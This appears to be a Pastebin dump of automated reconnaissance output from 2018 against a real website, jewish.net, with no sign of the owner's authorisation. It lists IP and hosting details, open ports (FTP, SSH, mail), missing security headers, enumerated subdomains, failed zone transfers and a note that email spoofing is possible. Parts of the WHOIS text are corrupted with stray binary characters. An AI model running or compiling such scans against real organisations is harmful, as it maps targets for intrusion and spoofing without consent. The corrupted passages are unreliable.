Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ######################################################################################################################################
- Hostname www.jewish.net ISP Global Net Access, LLC
- Continent North America Flag
- US
- Country United States Country Code US
- Region Texas Local time 12 Nov 2018 17:15 CST
- City Spring Postal Code 77388
- IP Address 69.73.184.159 Latitude 30.051
- Longitude -95.47
- #######################################################################################################################################
- > www.jewish.net
- Server: 194.187.251.67
- Address: 194.187.251.67#53
- Non-authoritative answer:
- www.jewish.net canonical name = jewish.net.
- Name: jewish.net
- Address: 69.73.184.159
- #######################################################################################################################################
- HostIP:69.73.184.159
- HostName:www.jewish.net
- Gathered Inet-whois information for 69.73.184.159
- --------------------------------------------------------------------------------------------------------------------------------------
- inetnum: 69.6.64.0 - 69.94.111.255
- netname: NON-RIPE-NCC-MANAGED-ADDRESS-BLOCK
- descr: IPv4 address block not managed by the RIPE NCC
- remarks: ------------------------------------------------------
- remarks:
- remarks: You can find the whois server to query, or the
- remarks: IANA registry to query on this web page:
- remarks: http://www.iana.org/assignments/ipv4-address-space
- remarks:
- remarks: You can access databases of other RIRs at:
- remarks:
- remarks: AFRINIC (Africa)
- remarks: http://www.afrinic.net/ whois.afrinic.net
- remarks:
- remarks: APNIC (Asia Pacific)
- remarks: http://www.apnic.net/ whois.apnic.net
- remarks:
- remarks: ARIN (Northern America)
- remarks: http://www.arin.net/ whois.arin.net
- remarks:
- remarks: LACNIC (Latin America and the Carribean)
- remarks: http://www.lacnic.net/ whois.lacnic.net
- remarks:
- remarks: IANA IPV4 Recovered Address Space
- remarks: http://www.iana.org/assignments/ipv4-recovered-address-space/ipv4-recovered-address-space.xhtml
- remarks:
- remarks: ------------------------------------------------------
- country: EU # Country is really world wide
- admin-c: IANA1-RIPE
- tech-c: IANA1-RIPE
- status: ALLOCATED UNSPECIFIED
- mnt-by: RIPE-NCC-HM-MNT
- mnt-lower: RIPE-NCC-HM-MNT
- created: 2018-02-20T15:36:33Z
- last-modified: 2018-09-04T13:34:51Z
- source: RIPE
- role: Internet Assigned Numbers Authority
- address: see http://www.iana.org.
- admin-c: IANA1-RIPE
- tech-c: IANA1-RIPE
- nic-hdl: IANA1-RIPE
- remarks: For more information on IANA services
- remarks: go to IANA web site at http://www.iana.org.
- mnt-by: RIPE-NCC-MNT
- created: 1970-01-01T00:00:00Z
- last-modified: 2001-09-22T09:31:27Z
- source: RIPE # Filtered
- % This query was served by the RIPE Database Query Service version 1.92.6 (HEREFORD)
- Gathered Inic-whois information for jewish.net
- ---------------------------------------------------------------------------------------------------------------------------------------
- Domain Name: JEWISH.NET
- Registry Domain ID: 1895875_DOMAIN_NET-VRSN
- Registrar WHOIS Server: whois.godaddy.com
- Registrar URL: http://www.godaddy.com
- Updated Date: 2018-02-16T10:48:18Z
- Creation Date: 1997-05-21T04:00:00Z
- Registry Expiry Date: 2021-05-22T04:00:00Z
- Registrar: GoDaddy.com, LLC
- Registrar IANA ID: 146
- Registrar Abuse Contact Email: abuse@godaddy.com
- Registrar Abuse Contact Phone: 480-624-2505
- Domain Status: clientDeleteProhibited https:/�U@cann.�~Ho0rg/�epp#cl�
- �ieU@ntDel�
- �et�U@e�U@h�������ibited
- Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
- Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
- Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
- Name Server: NS33.DOMAINCONTROL.COM
- Name Server: NS34.DOMAINCONTROL.COM
- DNSSEC: unsigned
- URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
- <<> Last update of whois database: 2018-11-12T23jV@:21:5�zH00Z <
- For more information on Whois status codes, please visit https://icann.org/epp
- �OTICE: The expiration date displayed in this reYV@date �zHt0he
- registrar's sponsorship of the domain name registration in the registry is
- currently set to expire. This date does not necessarily reflect the expiration
- date of the domain name registrant's agreement with the sponsoring
- registrar. Users may consult the sponsoring registrar's Whois database to
- view the registrar's reported date of expiration for this registration.
- TERMS OF USE: You are not authorized to access or query our Whois
- �an�U@dme Jrough the use of electronic processes�U@ that�~H 0aret high-D
- automated except as reasonably necessary to register domain names or
- modify existing registrations; the Data in VeriSign Global Registry
- Services' ("VeriSign") Whois database is provided by VeriSign for
- information purposes only, and to assist persons in obtaining information
- about or related to a domain name registration record. VeriSign does not
- guarantee its accuracy. By submitting a Whois query, you agree to abide
- by the following terms of use: You agree that yo�U@u may�~H 0use� this �
- �DaU@ta on�
- �ly�U@
- for lawful purposes and that under no circumstances will you use this Data
- to: (1) allow, enable, or otherwise support the transmission of mass
- unsolicited, commercial advertising or solicitations via e-mail, telephone,
- or facsimile; or (2) enable high volume, automated, electronic processes
- that apply to VeriSign (or its computer systems). The compilation,
- repackaging, dissemination or other use of this Data is expressly
- prohibited without the prior written consent of YV@VeriS�zHi0gn.� You a�
- �grXV@ee no�
- �t gV@to
- use electronic processes that are automated and high-volume to access or
- query the Whois database except as reasonably necessary to register
- domain names or modify existing registrations. VeriSign reserves the right
- to restrict your access to the Whois database in its sole discretion to ensure
- operational stability. VeriSign may restrict or terminate your access to the
- Whois database for failure to abide by these terms of use. VeriSign
- 0eserves the right to modify these terms at any �U@time.�~H
- The Registry database contains ONLY .COM, .NET, .EDU domains and
- Registrars.
- Gathered Netcraft information for www.jewish.net
- ---------------------------------------------------------------------------------------------------------------------------------------
- Retrieving Netcraft.com information for www.jewish.net
- Netcraft.com Information gathered
- Gathered Subdomain information for jewish.net
- ---------------------------------------------------------------------------------------------------------------------------------------
- Searching Google.com:80...
- HostName:www.jewish.net
- HostIP:69.73.184.159
- Searching Altavista.com:80...
- Found 1 possible subdomain(s) for host jewish.net, Searched 0 pages containing 0 results
- Gathered E-Mail information for jewish.net
- ---------------------------------------------------------------------------------------------------------------------------------------
- Searching Google.com:80...
- Searching Altavista.com:80...
- Found 0 E-Mail(s) for host jewish.net, Searched 0 pages containing 0 results
- Gathered TCP Port information for 69.73.184.159
- ---------------------------------------------------------------------------------------------------------------------------------------
- Port State
- 21/tcp open
- 22/tcp open
- 26/tcp open
- 80/tcp open
- 110/tcp open
- 143/tcp open
- Portscan Finished: Scanned 150 ports, 5 ports were in state closed
- ######################################################################################################################################
- [i] Scanning Site: http://www.jewish.net
- B A S I C I N F O
- ======================================================================================================================================
- [+] Site Title:
- [+] IP address: 69.73.184.159
- [+] Web Server: Could Not Detect
- [+] CMS: Could Not Detect
- [+] Cloudflare: Not Detected
- [+] Robots File: Could NOT Find robots.txt!
- W H O I S L O O K U P
- ======================================================================================================================================
- Domain Name: JEWISH.NET
- Registry Domain ID: 1895875_DOMAIN_NET-VRSN
- Registrar WHOIS Server: whois.godaddy.com
- Registrar URL: http://www.godaddy.com
- Updated Date: 2018-02-16T10:48:18Z
- Creation Date: 1997-05-21T04:00:00Z
- Registry Expiry Date: 2021-05-22T04:00:00Z
- Registrar: GoDaddy.com, LLC
- Registrar IANA ID: 146
- Registrar Abuse Contact Email: abuse@godaddy.com
- Registrar Abuse Contact Phone: 480-624-2505
- Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
- Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
- Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
- Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
- Name Server: NS33.DOMAINCONTROL.COM
- Name Server: NS34.DOMAINCONTROL.COM
- DNSSEC: unsigned
- URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
- >>> Last update of whois database: 2018-11-12T23:29:54Z <<<
- For more information on Whois status codes, please visit https://icann.org/epp
- The Registry database contains ONLY .COM, .NET, .EDU domains and
- Registrars.
- G E O I P L O O K U P
- ======================================================================================================================================
- [i] IP Address: 69.73.184.159
- [i] Country: US
- [i] State: Texas
- [i] City: Spring
- [i] Latitude: 30.079901
- [i] Longitude: -95.417198
- H T T P H E A D E R S
- =======================================================================================================================================
- [i] HTTP/1.1 200 OK
- [i] Date: Mon, 12 Nov 2018 23:30:03 GMT
- [i] Accept-Ranges: bytes
- [i] Content-Type: text/html
- [i] Connection: close
- D N S L O O K U P
- =======================================================================================================================================
- jewish.net. 1799 IN A 69.73.184.159
- jewish.net. 3599 IN NS ns33.domaincontrol.com.
- jewish.net. 3599 IN NS ns34.domaincontrol.com.
- jewish.net. 3599 IN SOA ns33.domaincontrol.com. dns.jomax.net. 2017060501 28800 7200 604800 3600
- jewish.net. 3599 IN MX 20 ALT1.ASPMX.L.GOOGLE.COM.et.
- jewish.net. 3599 IN MX 30 ALT2.ASPMX.L.GOOGLE.com.
- jewish.net. 3599 IN MX 10 ASPMX.L.GOOGLE.com.
- jewish.net. 3599 IN MX 40 ASPMX2.GOOGLEMAIL.com.
- jewish.net. 3599 IN MX 50 ASPMX3.GOOGLEMAIL.com.
- S U B N E T C A L C U L A T I O N
- =======================================================================================================================================
- Address = 69.73.184.159
- Network = 69.73.184.159 / 32
- Netmask = 255.255.255.255
- Broadcast = not needed on Point-to-Point links
- Wildcard Mask = 0.0.0.0
- Hosts Bits = 0
- Max. Hosts = 1 (2^0 - 0)
- Host Range = { 69.73.184.159 - 69.73.184.159 }
- N M A P P O R T S C A N
- =======================================================================================================================================
- Starting Nmap 7.40 ( https://nmap.org ) at 2018-11-12 23:30 UTC
- Nmap scan report for jewish.net (69.73.184.159)
- Host is up (0.020s latency).
- rDNS record for 69.73.184.159: finn.nocdirect.com
- PORT STATE SERVICE
- 21/tcp open ftp
- 22/tcp open ssh
- 23/tcp filtered telnet
- 80/tcp open http
- 110/tcp open pop3
- 143/tcp open imap
- 443/tcp open https
- 3389/tcp filtered ms-wbt-server
- Nmap done: 1 IP address (1 host up) scanned in 1.32 seconds
- S U B - D O M A I N F I N D E R
- =======================================================================================================================================
- [i] Total Subdomains Found : 4
- [+] Subdomain: vps1.jewish.net
- [-] IP: 209.217.253.175
- [+] Subdomain: vps2.jewish.net
- [-] IP: 209.140.30.90
- [+] Subdomain: vps3.jewish.net
- [-] IP: 209.140.28.114
- [+] Subdomain: update.jewish.net
- [-] IP: 209.140.28.114
- #######################################################################################################################################
- [?] Enter the target: http://www.jewish.net/
- [!] IP Address : 69.73.184.159
- [!] www.jewish.net doesn't seem to use a CMS
- [+] Honeypot Probabilty: 30%
- ---------------------------------------------------------------------------------------------------------------------------------------
- [~] Trying to gather whois information for www.jewish.net
- [+] Whois information found
- [-] Unable to build response, visit https://who.is/whois/www.jewish.net
- --------------------------------------------------------------------------------------------------------------------------------------
- PORT STATE SERVICE
- 21/tcp open ftp
- 22/tcp open ssh
- 23/tcp filtered telnet
- 80/tcp open http
- 110/tcp open pop3
- 143/tcp open imap
- 443/tcp open https
- 3389/tcp filtered ms-wbt-server
- Nmap done: 1 IP address (1 host up) scanned in 1.27 seconds
- ---------------------------------------------------------------------------------------------------------------------------------------
- [+] DNS Records
- ns34.domaincontrol.com. (173.201.74.17) AS26496 GoDaddy.com, LLC United States
- ns33.domaincontrol.com. (216.69.185.17) AS26496 GoDaddy.com, LLC United States
- [+] MX Records
- 30 (74.125.193.27) AS15169 Google Inc. United States
- [+] MX Records
- 10 (172.217.197.27) AS15169 Google Inc. United States
- [+] MX Records
- 40 (64.233.186.26) AS15169 Google Inc. United States
- [+] MX Records
- 50 (74.125.193.26) AS15169 Google Inc. United States
- [+] Host Records (A)
- www.jewish.netHTTP: (finn.nocdirect.com) (69.73.184.159) AS3595 Global Net Access, LLC United States
- [+] TXT Records
- [+] DNS Map: https://dnsdumpster.com/static/map/jewish.net.png
- [>] Initiating 3 intel modules
- [>] Loading Alpha module (1/3)
- [>] Beta module deployed (2/3)
- [>] Gamma module initiated (3/3)
- No emails found
- No hosts found
- [+] Virtual hosts:
- --------------------------------------------------------------------------------------------------------------------------------------
- ######################################################################################################################################
- -------------------------------------------------------------------------------------------------------------------------------------
- + Target IP: 69.73.184.159
- + Target Hostname: www.jewish.net
- + Target Port: 80
- + Start Time: 2018-11-12 18:19:41 (GMT-5)
- ---------------------------------------------------------------------------------------------------------------------------------------
- + Server: No banner retrieved
- + The anti-clickjacking X-Frame-Options header is not present.
- + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
- + ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
- + Scan terminated: 20 error(s) and 3 item(s) reported on remote host
- + End Time: 2018-11-12 18:26:34 (GMT-5) (413 seconds)
- --------------------------------------------------------------------------------------------------------------------------------------
- ######################################################################################################################################
- ---------------------------------------------------------------------------------------------------------------------------------------
- + Target IP: 69.73.184.159
- + Target Hostname: 69.73.184.159
- + Target Port: 443
- ---------------------------------------------------------------------------------------------------------------------------------------
- + SSL Info: Subject: /CN=finn.nocdirect.com.zz
- Ciphers: ECDHE-RSA-AES256-GCM-SHA384
- Issuer: /CN=finn.nocdirect.com.zz
- + Start Time: 2018-11-12 18:21:16 (GMT-5)
- --------------------------------------------------------------------------------------------------------------------------------------
- + Server: Apache
- + The anti-clickjacking X-Frame-Options header is not present.
- + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
- + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
- + ERROR: Error limit (20) reached for host, giving up. Last error: opening stream: can't connect: Connect failed: ; Connection timed out at /var/lib/nikto/plugins/LW2.pm line 5157.
- : Connection timed out
- + Scan terminated: 20 error(s) and 4 item(s) reported on remote host
- + End Time: 2018-11-12 18:28:06 (GMT-5) (410 seconds)
- --------------------------------------------------------------------------------------------------------------------------------------
- ######################################################################################################################################
- [+] Hosting Info for Website: www.jewish.net
- [+] Visitors per day: < 200
- [+] IP Address: 69.73.184.159
- [+] IP Reverse DNS (Host): finn.nocdirect.com
- [+] Hosting IP Range: 69.73.128.0 - 69.73.191.255 (16,384 ip)
- [+] Hosting Address: 2626 Spring Cypress Road, Spring, TX, 77388, US
- [+] Hosting Country: USA
- [+] Hosting Phone: +1-281-942-2800
- [+] Hosting Website: www.networktransit.net
- [+] CIDR: 69.73.128.0/18
- [+] Hosting CIDR: 69.73.128.0/18
- [+] NS: jewish.net
- [+] NS: ns33.domaincontrol.com
- [+] NS: ns34.domaincontrol.com
- #######################################################################################################################################
- ; <<>> DiG 9.11.5-1-Debian <<>> jewish.net
- ;; global options: +cmd
- ;; Got answer:
- ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 54838
- ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
- ;; OPT PSEUDOSECTION:
- ; EDNS: version: 0, flags:; udp: 4096
- ;; QUESTION SECTION:
- ;jewish.net. IN A
- ;; ANSWER SECTION:
- jewish.net. 1800 IN A 69.73.184.159
- ;; Query time: 143 msec
- ;; SERVER: 194.187.251.67#53(194.187.251.67)
- ;; WHEN: lun nov 12 18:51:17 EST 2018
- ;; MSG SIZE rcvd: 55
- ######################################################################################################################################
- ; <<>> DiG 9.11.5-1-Debian <<>> +trace jewish.net
- ;; global options: +cmd
- . 84677 IN NS e.root-servers.net.
- . 84677 IN NS f.root-servers.net.
- . 84677 IN NS m.root-servers.net.
- . 84677 IN NS i.root-servers.net.
- . 84677 IN NS h.root-servers.net.
- . 84677 IN NS c.root-servers.net.
- . 84677 IN NS d.root-servers.net.
- . 84677 IN NS a.root-servers.net.
- . 84677 IN NS l.root-servers.net.
- . 84677 IN NS g.root-servers.net.
- . 84677 IN NS b.root-servers.net.
- . 84677 IN NS j.root-servers.net.
- . 84677 IN NS k.root-servers.net.
- . 84677 IN RRSIG NS 8 0 518400 20181125170000 20181112160000 2134 . j4dK8ZhBRxbwKKnFW+JtmtK9/SEOrKadV7KLXxE+MdXi7lEbPdeHwyO3 SKwAaMtOA1wla7tEP94C/7P0o9oztfesyTErvWY7ihkbRenZFxa2bY62 eYohQCNyedJj1bo1K/KrZjX/ixeynC2bq5f4MXH7mWTVFvFload2MqPH 1BBl/xAVIghpJe604i4oB7mEPlznlYyDPPLnJzMii45ZRbXe3AU/9adY FRkrxt3VbHnFUGcFyIqcLdzwKtpj5R7fAqPdtVs5+VXYmPuSGqFNQ8BP tgoJRA7lOAQ2eT5/Clg15MkEHDwPJ/+inztfg9tQq2PTWkpg800TohHr +Y2JEg==
- ;; Received 525 bytes from 194.187.251.67#53(194.187.251.67) in 132 ms
- net. 172800 IN NS a.gtld-servers.net.
- net. 172800 IN NS b.gtld-servers.net.
- net. 172800 IN NS c.gtld-servers.net.
- net. 172800 IN NS d.gtld-servers.net.
- net. 172800 IN NS e.gtld-servers.net.
- net. 172800 IN NS f.gtld-servers.net.
- net. 172800 IN NS g.gtld-servers.net.
- net. 172800 IN NS h.gtld-servers.net.
- net. 172800 IN NS i.gtld-servers.net.
- net. 172800 IN NS j.gtld-servers.net.
- net. 172800 IN NS k.gtld-servers.net.
- net. 172800 IN NS l.gtld-servers.net.
- net. 172800 IN NS m.gtld-servers.net.
- net. 86400 IN DS 35886 8 2 7862B27F5F516EBE19680444D4CE5E762981931842C465F00236401D 8BD973EE
- net. 86400 IN RRSIG DS 8 1 86400 20181125170000 20181112160000 2134 . 2m7FFQ+rJsxmfmS3yFvcc1zbQU2EkZlKzPtmRji5jrpNHDd+UKS1kA9j N4t/oXy27f3AiH+K8jHlOOqnl77ihyTZ54tBQHTL0pb2GjBbiNsGmJUc NoTAYbmZ7VJTvE8DrkY/I2ZtlMYDCZrKsOWG+hf6HWfgQO3gyqu7Momr PUNHXs10fv31T94/D3E8m+RMc4tKlia+5cWwfoN3kqwjRxtEOjgYXMFN HIIppGEWEGmXHfAJhW2osdFVM3wLWi/jql3WqBoJgHj0GnbA6Z04ZB6P m2PRB8up3/ZarNlJ6+piAI5B5ExwXnxo4AIyqDqYg1sQDhAsbJQJ+TwE ul+vIQ==
- ;; Received 1167 bytes from 2001:7fd::1#53(k.root-servers.net) in 136 ms
- jewish.net. 172800 IN NS ns33.domaincontrol.com.
- jewish.net. 172800 IN NS ns34.domaincontrol.com.
- A1RT98BS5QGC9NFI51S9HCI47ULJG6JH.net. 86400 IN NSEC3 1 1 0 - A1RUUFFJKCT2Q54P78F8EJGJ8JBK7I8B NS SOA RRSIG DNSKEY NSEC3PARAM
- A1RT98BS5QGC9NFI51S9HCI47ULJG6JH.net. 86400 IN RRSIG NSEC3 8 2 86400 20181116062711 20181109051711 6140 net. wrG8JgFFtuyQ5Re8TfxvOqM4SQwLK54XFMgDJzzMtOLNBNro4a+/TVy+ 3psbwhp8vLA8CIL6QMbQe7KQYkbXsVXiYzGNn/Ywp2Kk5DYHZc95foRe Tk2QAJUqVjBzr5O9+G6F62tVM+t0N2expPKlL2AqhQu2hDIPdSPm5K7M i2U=
- NFMMI3N1148H3LEPNQB26PTI6JHN9CVT.net. 86400 IN NSEC3 1 1 0 - NFN5TMSMHCFFAK16T6L9MF4CM6HTH12J NS DS RRSIG
- NFMMI3N1148H3LEPNQB26PTI6JHN9CVT.net. 86400 IN RRSIG NSEC3 8 2 86400 20181116062223 20181109051223 6140 net. Ma8UDXqe1pT+q3QGtClajQpf/iXJHnhpvIqWZ5RSccaj/kGgn//V0QJH 4DdTtCgyIGobmETcLugFy1/biZI+q1Yy8hOBHCMqgn/QDmT1hwoDNRJs OnvbKcEnz1Cwc4kqDuxlsZQB34px8rMr8q0n7+FqCkISQ0+7pCc6zJbg m9o=
- ;; Received 667 bytes from 2001:503:eea3::30#53(g.gtld-servers.net) in 134 ms
- jewish.net. 1800 IN A 69.73.184.159
- jewish.net. 3600 IN NS ns33.domaincontrol.com.
- jewish.net. 3600 IN NS ns34.domaincontrol.com.
- ;; Received 110 bytes from 2603:5:22a1::11#53(ns34.domaincontrol.com) in 133 ms
- ######################################################################################################################################
- [*] Performing General Enumeration of Domain: jewish.net
- [-] DNSSEC is not configured for jewish.net
- [*] SOA ns33.domaincontrol.com 216.69.185.17
- [*] NS ns33.domaincontrol.com 216.69.185.17
- [*] NS ns33.domaincontrol.com 2607:f208:206::11
- [*] NS ns34.domaincontrol.com 173.201.74.17
- [*] NS ns34.domaincontrol.com 2603:5:22a1::11
- [*] MX ASPMX.L.GOOGLE.COM 74.125.133.26
- [*] MX ALT2.ASPMX.L.GOOGLE.COM 172.217.194.27
- [*] MX ASPMX2.GOOGLEMAIL.COM 64.233.164.27
- [*] MX ASPMX3.GOOGLEMAIL.COM 172.217.194.26
- [*] MX ASPMX.L.GOOGLE.COM 2a00:1450:400c:c06::1b
- [*] MX ALT2.ASPMX.L.GOOGLE.COM 2404:6800:4003:c04::1a
- [*] MX ASPMX2.GOOGLEMAIL.COM 2a00:1450:4010:c07::1b
- [*] A jewish.net 69.73.184.159
- [*] Enumerating SRV Records
- [-] No SRV Records Found for jewish.net
- [+] 0 Records Found
- ######################################################################################################################################
- [*] Processing domain jewish.net
- [+] Getting nameservers
- 216.69.185.17 - ns33.domaincontrol.com
- 173.201.74.17 - ns34.domaincontrol.com
- [-] Zone transfer failed
- [+] MX records found, added to target list
- 10 ASPMX.L.GOOGLE.COM.
- 30 ALT2.ASPMX.L.GOOGLE.COM.
- 40 ASPMX2.GOOGLEMAIL.COM.
- 20 ALT1.ASPMX.L.GOOGLE.COM.et.
- 50 ASPMX3.GOOGLEMAIL.COM.
- [*] Scanning jewish.net for A records
- 69.73.184.159 - jewish.net
- 69.73.184.159 - ftp.jewish.net
- 209.140.28.114 - update.jewish.net
- 209.217.253.175 - vps1.jewish.net
- 209.140.30.90 - vps2.jewish.net
- 68.178.252.5 - webmail.jewish.net
- 72.167.218.55 - webmail.jewish.net
- 173.201.192.133 - webmail.jewish.net
- 173.201.192.5 - webmail.jewish.net
- 173.201.193.133 - webmail.jewish.net
- 173.201.193.20 - webmail.jewish.net
- 173.201.192.20 - webmail.jewish.net
- 173.201.193.5 - webmail.jewish.net
- 173.201.192.148 - webmail.jewish.net
- 72.167.218.173 - webmail.jewish.net
- 68.178.252.148 - webmail.jewish.net
- 97.74.135.45 - webmail.jewish.net
- 68.178.252.20 - webmail.jewish.net
- 68.178.252.133 - webmail.jewish.net
- 72.167.218.183 - webmail.jewish.net
- 45.40.130.40 - webmail.jewish.net
- 97.74.135.148 - webmail.jewish.net
- 72.167.218.45 - webmail.jewish.net
- 45.40.130.41 - webmail.jewish.net
- 97.74.135.55 - webmail.jewish.net
- 97.74.135.133 - webmail.jewish.net
- 173.201.193.148 - webmail.jewish.net
- 69.73.184.159 - www.jewish.net
- ######################################################################################################################################
- Total hosts: 9
- [-] Resolving hostnames IPs...
- ...jewish-net:empty
- vps1.jewish.net:209.217.253.175
- vps3.jewish.net:209.140.28.114
- www.jewish-net:empty
- www.jewish.net:69.73.184.159
- www.vps1.jewish.net:empty
- www.vps3.jewish.net:empty
- #####################################################################################################################################
- Ip Address Status Type Domain Name Server
- ---------------------------------------------------------------------------------------------------------------------------------------
- 69.73.184.159 200 alias ftp.jewish.net
- 69.73.184.159 200 host jewish.net
- 209.140.28.114 host update.jewish.net
- 72.167.218.173 301 alias webmail.jewish.net
- 72.167.218.173 301 alias webmail.secureserver.net
- 72.167.218.173 301 host email.secureserver.net
- 72.167.218.183 301 host email.secureserver.net
- 173.201.193.133 301 host email.secureserver.net
- 173.201.192.20 301 host email.secureserver.net
- 173.201.193.148 301 host email.secureserver.net
- 72.167.218.55 301 host email.secureserver.net
- 45.40.130.41 301 host email.secureserver.net
- 72.167.218.45 301 host email.secureserver.net
- 173.201.192.148 301 host email.secureserver.net
- 173.201.192.5 301 host email.secureserver.net
- 68.178.252.5 301 host email.secureserver.net
- 97.74.135.55 301 host email.secureserver.net
- 97.74.135.148 301 host email.secureserver.net
- 173.201.193.20 301 host email.secureserver.net
- 173.201.193.5 301 host email.secureserver.net
- 97.74.135.45 301 host email.secureserver.net
- 68.178.252.148 301 host email.secureserver.net
- 173.201.192.133 301 host email.secureserver.net
- 68.178.252.133 301 host email.secureserver.net
- 68.178.252.20 301 host email.secureserver.net
- 97.74.135.133 301 host email.secureserver.net
- 45.40.130.40 301 host email.secureserver.net
- 69.73.184.159 200 alias www.jewish.net Apache
- 69.73.184.159 200 host jewish.net Apache
- ######################################################################################################################################
- [+] Testing domain
- www.jewish.net 69.73.184.159
- [+] Dns resolving
- Domain name Ip address Name server
- jewish.net 69.73.184.159 finn.nocdirect.com
- Found 1 host(s) for jewish.net
- [+] Testing wildcard
- Ok, no wildcard found.
- [+] Scanning for subdomain on jewish.net
- [!] Wordlist not specified. I scannig with my internal wordlist...
- Estimated time about 69.62 seconds
- Subdomain Ip address Name server
- ftp.jewish.net 69.73.184.159 finn.nocdirect.com
- update.jewish.net 209.140.28.114 vps.moviesonlinefreestreaming.org
- webmail.jewish.net 45.40.130.40 p3plgemwbe26-v05.prod.phx3.secureserver.net
- www.jewish.net 69.73.184.159 finn.nocdirect.com
- ######################################################################################################################################
- dnsenum VERSION:1.2.4
- ----- www.jewish.net -----
- Host's addresses:
- __________________
- jewish.net. 1604 IN A 69.73.184.159
- Name Servers:
- ______________
- ns33.domaincontrol.com. 86399 IN A 216.69.185.17
- ns34.domaincontrol.com. 86399 IN A 173.201.74.17
- Mail (MX) Servers:
- ___________________
- ASPMX3.GOOGLEMAIL.COM. 293 IN A 172.217.194.26
- ASPMX2.GOOGLEMAIL.COM. 293 IN A 64.233.164.26
- ALT2.ASPMX.L.GOOGLE.COM. 211 IN A 172.217.194.26
- ASPMX.L.GOOGLE.COM. 200 IN A 108.177.15.26
- Trying Zone Transfers and getting Bind Versions:
- _________________________________________________
- Trying Zone Transfer for www.jewish.net on ns33.domaincontrol.com ...
- Trying Zone Transfer for www.jewish.net on ns34.domaincontrol.com ...
- brute force file not specified, bay.
- ######################################################################################################################################
- Running Source: [33;1;1mAsk
- Running Source: [33;1;1mArchive.is
- Running Source: [33;1;1mBaidu
- Running Source: [33;1;1mBing
- Running Source: [33;1;1mCertDB
- Running Source: [33;1;1mCertificateTransparency
- Running Source: [33;1;1mCertspotter
- Running Source: [33;1;1mCommoncrawl
- Running Source: [33;1;1mCrt.sh
- Running Source: [33;1;1mDnsdb
- Running Source: [33;1;1mDNSDumpster
- Running Source: [33;1;1mDNSTable
- Running Source: [33;1;1mDogpile
- Running Source: [33;1;1mExalead
- Running Source: [33;1;1mFindsubdomains
- Running Source: [33;1;1mGoogleter
- Running Source: [33;1;1mHackertarget
- Running Source: [33;1;1mIpv4Info
- Running Source: [33;1;1mPTRArchive
- Running Source: [33;1;1mSitedossier
- Running Source: [33;1;1mThreatcrowd
- Running Source: [33;1;1mThreatMiner
- Running Source: [33;1;1mWaybackArchive
- Running Source: [33;1;1mYahoo
- Running enumeration on www.jewish.net
- dnsdb: Unexpected return status 503
- waybackarchive: Get https://web.archive.org/cdx/search/cdx?url=*.www.jewish.net/*&output=json&fl=original&collapse=urlkey&page=: net/http: invalid header field value "http://web.archive.org/cdx/search/cdx?url=*.www.jewish.net/*&output=json&fl=original&collapse=urlkey&page=\x00" for key Referer
- Starting Bruteforcing of [33;1;1mwww.jewish.net with [33;1;1m9985 words
- Total [33;1;1m1 Unique subdomains found for www.jewish.net
- .www.jewish.net
- ######################################################################################################################################
- [*] Processing domain www.jewish.net
- [+] Getting nameservers
- 216.69.185.17 - ns33.domaincontrol.com
- 173.201.74.17 - ns34.domaincontrol.com
- [-] Zone transfer failed
- [+] MX records found, added to target list
- 50 ASPMX3.GOOGLEMAIL.COM.
- 40 ASPMX2.GOOGLEMAIL.COM.
- 30 ALT2.ASPMX.L.GOOGLE.COM.
- 10 ASPMX.L.GOOGLE.COM.
- 20 ALT1.ASPMX.L.GOOGLE.COM.et.
- [*] Scanning www.jewish.net for A records
- 69.73.184.159 - www.jewish.net
- ######################################################################################################################################
- [+] www.jewish.net has no SPF record!
- [*] No DMARC record found. Looking for organizational record
- [+] No organizational DMARC record
- [+] Spoofing possible for www.jewish.net!
- ######################################################################################################################################
- __
- ____ _____ ___ ______ _/ /_____ ____ ___
- / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
- / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
- \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
- /_/ discover v0.5.0 - by @michenriksen
- Identifying nameservers for www.jewish.net... Done
- Using nameservers:
- - 216.69.185.17
- - 173.201.74.17
- Checking for wildcard DNS... Done
- Running collector: Threat Crowd... Done (0 hosts)
- Running collector: DNSDB... Error
- -> DNSDB returned unexpected response code: 503
- Running collector: Netcraft... Done (0 hosts)
- Running collector: PublicWWW... Done (0 hosts)
- Running collector: Censys... Skipped
- -> Key 'censys_secret' has not been set
- Running collector: Wayback Machine... Done (4 hosts)
- Running collector: PTRArchive... Error
- -> PTRArchive returned unexpected response code: 502
- Running collector: PassiveTotal... Skipped
- -> Key 'passivetotal_key' has not been set
- Running collector: Shodan... Skipped
- -> Key 'shodan' has not been set
- Running collector: Riddler... Skipped
- -> Key 'riddler_username' has not been set
- Running collector: VirusTotal... Skipped
- -> Key 'virustotal' has not been set
- Running collector: Dictionary... Done (0 hosts)
- Running collector: HackerTarget... Done (1 host)
- Running collector: Google Transparency Report... Done (0 hosts)
- Running collector: Certificate Search... Done (0 hosts)
- Resolving 4 unique hosts...
- 69.73.184.159 jewish.net
- 209.140.28.114 update.jewish.net
- 69.73.184.159 www.jewish.net
- Found subnets:
- - 69.73.184.0-255 : 2 hosts
- Wrote 3 hosts to:
- - file:///root/aquatone/www.jewish.net/hosts.txt
- - file:///root/aquatone/www.jewish.net/hosts.json
- __
- ____ _____ ___ ______ _/ /_____ ____ ___
